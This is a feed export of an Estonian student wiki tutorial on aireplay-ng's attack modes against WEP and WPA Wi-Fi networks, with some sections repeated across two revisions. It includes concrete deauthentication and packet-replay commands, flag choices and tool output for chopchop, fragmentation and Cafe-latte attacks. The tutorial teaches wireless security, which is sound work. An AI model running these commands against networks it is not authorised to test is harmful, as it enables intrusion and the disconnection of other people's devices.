Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32783</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32783"/>
		<updated>2011-05-24T18:36:08Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Suunatud */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
